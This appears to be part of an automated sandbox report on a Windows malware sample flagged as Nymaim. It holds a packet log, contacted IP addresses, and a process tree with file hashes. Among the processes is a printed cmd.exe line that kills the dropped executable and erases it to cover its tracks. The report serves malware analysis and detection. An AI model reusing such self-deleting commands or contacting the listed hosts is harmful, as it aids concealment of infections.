                Jan 5, 2023 08:56:07.990214109 CET  80           49685      107.182.129.235  192.168.2.3
                Jan 5, 2023 08:56:07.990236044 CET  49685        80         192.168.2.3      107.182.129.235
                Jan 5, 2023 08:56:07.990262032 CET  49685        80         192.168.2.3      107.182.129.235
                Jan 5, 2023 08:56:07.990263939 CET  80           49685      107.182.129.235  192.168.2.3
                Jan 5, 2023 08:56:07.990310907 CET  49685        80         192.168.2.3      107.182.129.235
                Jan 5, 2023 08:56:07.990314960 CET  80           49685      107.182.129.235  192.168.2.3
                Jan 5, 2023 08:56:07.990365028 CET  80           49685      107.182.129.235  192.168.2.3
                Jan 5, 2023 08:56:07.990381956 CET  49685        80         192.168.2.3      107.182.129.235
                Jan 5, 2023 08:56:07.990413904 CET  80           49685      107.182.129.235  192.168.2.3
                Jan 5, 2023 08:56:07.990427017 CET  49685        80         192.168.2.3      107.182.129.235
                Jan 5, 2023 08:56:07.990462065 CET  80           49685      107.182.129.235  192.168.2.3
                Jan 5, 2023 08:56:07.990494013 CET  80           49685      107.182.129.235  192.168.2.3
                Jan 5, 2023 08:56:07.990529060 CET  80           49685      107.182.129.235  192.168.2.3
                Jan 5, 2023 08:56:07.990629911 CET  49685        80         192.168.2.3      107.182.129.235
                Jan 5, 2023 08:56:08.017534971 CET  80           49685      107.182.129.235  192.168.2.3
                Jan 5, 2023 08:56:08.017608881 CET  80           49685      107.182.129.235  192.168.2.3
                Jan 5, 2023 08:56:08.017657042 CET  80           49685      107.182.129.235  192.168.2.3
                Jan 5, 2023 08:56:08.017700911 CET  80           49685      107.182.129.235  192.168.2.3
                Jan 5, 2023 08:56:08.017730951 CET  49685        80         192.168.2.3      107.182.129.235
                Jan 5, 2023 08:56:08.017730951 CET  49685        80         192.168.2.3      107.182.129.235
                Jan 5, 2023 08:56:08.017730951 CET  49685        80         192.168.2.3      107.182.129.235
                Jan 5, 2023 08:56:08.017749071 CET  80           49685      107.182.129.235  192.168.2.3
                Jan 5, 2023 08:56:08.017796993 CET  80           49685      107.182.129.235  192.168.2.3
                Jan 5, 2023 08:56:08.017797947 CET  49685        80         192.168.2.3      107.182.129.235
                Jan 5, 2023 08:56:08.017797947 CET  49685        80         192.168.2.3      107.182.129.235
                Jan 5, 2023 08:56:08.017848015 CET  80           49685      107.182.129.235  192.168.2.3
                Jan 5, 2023 08:56:08.017880917 CET  49685        80         192.168.2.3      107.182.129.235
                Jan 5, 2023 08:56:08.017894983 CET  80           49685      107.182.129.235  192.168.2.3
                Jan 5, 2023 08:56:08.017904043 CET  49685        80         192.168.2.3      107.182.129.235
                Jan 5, 2023 08:56:08.017940998 CET  80           49685      107.182.129.235  192.168.2.3
                Jan 5, 2023 08:56:08.017947912 CET  49685        80         192.168.2.3      107.182.129.235
                Jan 5, 2023 08:56:08.017985106 CET  80           49685      107.182.129.235  192.168.2.3
                Jan 5, 2023 08:56:08.017991066 CET  49685        80         192.168.2.3      107.182.129.235
                Jan 5, 2023 08:56:08.018032074 CET  80           49685      107.182.129.235  192.168.2.3
                Jan 5, 2023 08:56:08.018035889 CET  49685        80         192.168.2.3      107.182.129.235
                Jan 5, 2023 08:56:08.018078089 CET  80           49685      107.182.129.235  192.168.2.3
                Jan 5, 2023 08:56:08.018080950 CET  49685        80         192.168.2.3      107.182.129.235
                Jan 5, 2023 08:56:08.018122911 CET  80           49685      107.182.129.235  192.168.2.3
                Jan 5, 2023 08:56:08.018126011 CET  49685        80         192.168.2.3      107.182.129.235
                Jan 5, 2023 08:56:08.018167973 CET  80           49685      107.182.129.235  192.168.2.3
                Jan 5, 2023 08:56:08.018171072 CET  49685        80         192.168.2.3      107.182.129.235
                Jan 5, 2023 08:56:08.018214941 CET  80           49685      107.182.129.235  192.168.2.3
                Jan 5, 2023 08:56:08.018218040 CET  49685        80         192.168.2.3      107.182.129.235
                Jan 5, 2023 08:56:08.018260956 CET  80           49685      107.182.129.235  192.168.2.3
                Jan 5, 2023 08:56:08.018268108 CET  49685        80         192.168.2.3      107.182.129.235
                Jan 5, 2023 08:56:08.018307924 CET  80           49685      107.182.129.235  192.168.2.3
                Jan 5, 2023 08:56:08.018313885 CET  49685        80         192.168.2.3      107.182.129.235
                Jan 5, 2023 08:56:08.018353939 CET  80           49685      107.182.129.235  192.168.2.3
                Jan 5, 2023 08:56:08.018364906 CET  49685        80         192.168.2.3      107.182.129.235
                Jan 5, 2023 08:56:08.018399954 CET  80           49685      107.182.129.235  192.168.2.3
                Jan 5, 2023 08:56:08.018410921 CET  49685        80         192.168.2.3      107.182.129.235
                Jan 5, 2023 08:56:08.018445015 CET  80           49685      107.182.129.235  192.168.2.3
                Jan 5, 2023 08:56:08.018456936 CET  49685        80         192.168.2.3      107.182.129.235
                Jan 5, 2023 08:56:08.018511057 CET  49685        80         192.168.2.3      107.182.129.235
                Jan 5, 2023 08:56:08.045362949 CET  80           49685      107.182.129.235  192.168.2.3
                Jan 5, 2023 08:56:08.045439959 CET  80           49685      107.182.129.235  192.168.2.3
                Jan 5, 2023 08:56:08.045490026 CET  80           49685      107.182.129.235  192.168.2.3
                Jan 5, 2023 08:56:08.045516014 CET  49685        80         192.168.2.3      107.182.129.235
                Jan 5, 2023 08:56:08.045542002 CET  80           49685      107.182.129.235  192.168.2.3
                Jan 5, 2023 08:56:08.045578957 CET  49685        80         192.168.2.3      107.182.129.235
                Jan 5, 2023 08:56:08.045578957 CET  49685        80         192.168.2.3      107.182.129.235
                Jan 5, 2023 08:56:08.045592070 CET  80           49685      107.182.129.235  192.168.2.3
                Jan 5, 2023 08:56:08.045603037 CET4968580192.168.2.3107.182.129.235
                Jan 5, 2023 08:56:08.045643091 CET8049685107.182.129.235192.168.2.3
                Jan 5, 2023 08:56:08.045655966 CET4968580192.168.2.3107.182.129.235
                Jan 5, 2023 08:56:08.045691967 CET8049685107.182.129.235192.168.2.3
                Jan 5, 2023 08:56:08.045712948 CET4968580192.168.2.3107.182.129.235
                Jan 5, 2023 08:56:08.045737982 CET8049685107.182.129.235192.168.2.3
                Jan 5, 2023 08:56:08.045749903 CET4968580192.168.2.3107.182.129.235
                Jan 5, 2023 08:56:08.045785904 CET8049685107.182.129.235192.168.2.3
                Jan 5, 2023 08:56:08.045799017 CET4968580192.168.2.3107.182.129.235
                Jan 5, 2023 08:56:08.045836926 CET8049685107.182.129.235192.168.2.3
                Jan 5, 2023 08:56:08.045854092 CET4968580192.168.2.3107.182.129.235
                Jan 5, 2023 08:56:08.045883894 CET8049685107.182.129.235192.168.2.3
                Jan 5, 2023 08:56:08.045897961 CET4968580192.168.2.3107.182.129.235
                Jan 5, 2023 08:56:08.045931101 CET8049685107.182.129.235192.168.2.3
                Jan 5, 2023 08:56:08.045943975 CET4968580192.168.2.3107.182.129.235
                Jan 5, 2023 08:56:08.045978069 CET8049685107.182.129.235192.168.2.3
                Jan 5, 2023 08:56:08.045985937 CET4968580192.168.2.3107.182.129.235
                Jan 5, 2023 08:56:08.046024084 CET8049685107.182.129.235192.168.2.3
                Jan 5, 2023 08:56:08.046040058 CET4968580192.168.2.3107.182.129.235
                • 45.139.105.171
                • 107.182.129.235
                • 171.22.30.106

                Click to jump to process

                Target ID: 0
                Start time: 08:55:57
                Start date: 05/01/2023
                Path: C:\Users\user\Desktop\file.exe
                Wow64 process (32bit): true
                Commandline: C:\Users\user\Desktop\file.exe
                Imagebase: 0x400000
                File size: 2094367 bytes
                MD5 hash: E0F8085C7CB8EB9CF1C263BB12CFC6DF
                Has elevated privileges: true
                Has administrator privileges: true
                Programmed in: C, C++ or other language
                Reputation: low

                Target ID: 1
                Start time: 08:55:58
                Start date: 05/01/2023
                Path: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                Wow64 process (32bit): true
                Commandline: "C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp" /SL4 $203A8 "C:\Users\user\Desktop\file.exe" 1818498 170496
                Imagebase: 0x400000
                File size: 778752 bytes
                MD5 hash: E8176050192FBB976D70238E3C121F4C
                Has elevated privileges: true
                Has administrator privileges: true
                Programmed in: C, C++ or other language
                Reputation: moderate

                Target ID: 2
                Start time: 08:56:02
                Start date: 05/01/2023
                Path: C:\Program Files (x86)\Split Files\SplitFiles131.exe
                Wow64 process (32bit): true
                Commandline: "C:\Program Files (x86)\Split Files\SplitFiles131.exe"
                Imagebase: 0x400000
                File size: 3491315 bytes
                MD5 hash: 361518D6CC3C25EEC2DFC1DE82B055B2
                Has elevated privileges: true
                Has administrator privileges: true
                Programmed in: C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000002.00000002.338322825.0000000003370000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000002.00000002.338187863.0000000003130000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000002.00000002.337441362.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                Antivirus matches:
                • Detection: 100%, Joe Sandbox ML
                Reputation: low

                Target ID: 3
                Start time: 08:56:05
                Start date: 05/01/2023
                Path: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\2v3Q9V1aRpd.exe
                Wow64 process (32bit): true
                Commandline: (none recorded)
                Imagebase: 0x1310000
                File size: 73728 bytes
                MD5 hash: 3FB36CB0B7172E5298D2992D42984D06
                Has elevated privileges: true
                Has administrator privileges: true
                Programmed in: C, C++ or other language
                Antivirus matches:
                • Detection: 50%, ReversingLabs
                Reputation: high

                Target ID: 12
                Start time: 08:56:39
                Start date: 05/01/2023
                Path: C:\Windows\SysWOW64\cmd.exe
                Wow64 process (32bit): true
                Commandline: "C:\Windows\System32\cmd.exe" /c taskkill /im "SplitFiles131.exe" /f & erase "C:\Program Files (x86)\Split Files\SplitFiles131.exe" & exit
                Imagebase: 0xb0000
                File size: 232960 bytes
                MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
                Has elevated privileges: true
                Has administrator privileges: true
                Programmed in: C, C++ or other language
                Reputation: high

                Target ID: 13
                Start time: 08:56:39
                Start date: 05/01/2023
                Path: C:\Windows\System32\conhost.exe
                Wow64 process (32bit): false
                Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase: 0x7ff745070000
                File size: 625664 bytes
                MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
                Has elevated privileges: true
                Has administrator privileges: true
                Programmed in: C, C++ or other language
                Reputation: high

                Target ID: 14
                Start time: 08:56:39
                Start date: 05/01/2023
                Path: C:\Windows\SysWOW64\taskkill.exe
                Wow64 process (32bit): true
                Commandline: taskkill /im "SplitFiles131.exe" /f
                Imagebase: 0xff0000
                File size: 74752 bytes
                MD5 hash: 15E2E0ACD891510C6268CB8899F2A1A1
                Has elevated privileges: true
                Has administrator privileges: true
                Programmed in: C, C++ or other language
                Reputation: high

                No disassembly